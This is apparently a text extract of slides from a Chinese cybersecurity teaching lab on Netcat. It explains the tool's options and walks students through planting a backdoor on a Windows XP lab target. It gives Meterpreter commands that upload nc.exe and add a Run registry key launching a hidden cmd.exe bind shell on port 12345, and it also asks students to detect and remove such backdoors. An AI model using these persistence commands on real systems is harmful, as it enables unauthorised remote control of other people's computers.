网络空间安全技术实践教程第四篇渗透攻击测试实验篇第十五章漏洞利用实验15.1Netcat利用实验网络空间安全技术实践教程215.1Netcat利用实验实验目的:熟练掌握Netcat工具的使用以及利用Meterpreter和Netcat在目标系统留取后门的流程。网络空间安全技术实践教程315.1Netcat利用实验实验原理:Netcat是一款用于发送和接收TCP和UDP流量的工具,它既可以以服务器模式来运行,也可以以客户端模式来运行。Netcat的功能十分强大,被人们称作“瑞士军刀”,它可以用来登录远程服务(类似于Telnet),在计算机之间传递文件,执行端口扫描,进行即时通信,搭建简单的服务器等等。网络空间安全技术实践教程415.1Netcat利用实验实验原理:网络空间安全技术实践教程5连接到服务器:nc[-options]hostnameport[s][ports]...监听或入站:nc-l-pport[-options][hostname][port]常用参数:-d后台隐藏运行(仅适用于Windows)-eprogram建立连接后执行的程序-l监听状态(连接断开后监听停止)-L监听状态(仅适用于Windows,连接断开后仍保持监听)-pport本地端口号-uUDP模式-v显示详细信息(-vv可显示更详细的信息)-wsecs设置时延-z零I/O模式(用于端口扫描)15.1Netcat利用实验实验要点说明:(实验难点说明)Meterpreter的使用Netcat的使用网络空间安全技术实践教程615.1Netcat利用实验实验准备:(实验环境,实验先有知识技术说明)KaliLinuxNetcat(Windows版本)WindowsXP(靶机)网络空间安全技术实践教程715.1Netcat利用实验实验步骤:(1)在留取后门之前,首先要获得目标系统的控制权。假设我们已经使用Metasploit对目标计算机完成了漏洞利用并获取了一个Meterpreter的shell,我们可以使用该shell与目标计算机进行交互。网络空间安全技术实践教程815.1Netcat利用实验实验步骤:(2)将Netcat程序上传到目标计算机上:meterpreteruploadnc.exeC:\\WINDOWS\\system32网络空间安全技术实践教程915.1Netcat利用实验实验步骤:(3)使用regsetval命令将Netcat写入注册表的启动项:meterpreterregsetval-kHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run-vNetcat-d'C:\WINDOWS\system32\nc.exe-Ldp12345-ecmd.exe‘网络空间安全技术实践教程1015.1Netcat利用实验实验步骤:(4)使用Netcat登陆目标计算机上的后门进行验证。网络空间安全技术实践教程1115.1Netcat利用实验实验要求:使用Metasploit和Netcat工具在Windows系统和Linux系统上留取后门。网络空间安全技术实践教程1215.1Netcat利用实验实验扩展要求:对Windows系统和Linux系统分别分析如何检查并清除Netcat后门程序。网络空间安全技术实践教程1315.1Netcat利用实验实验视频:网络空间安全技术实践教程14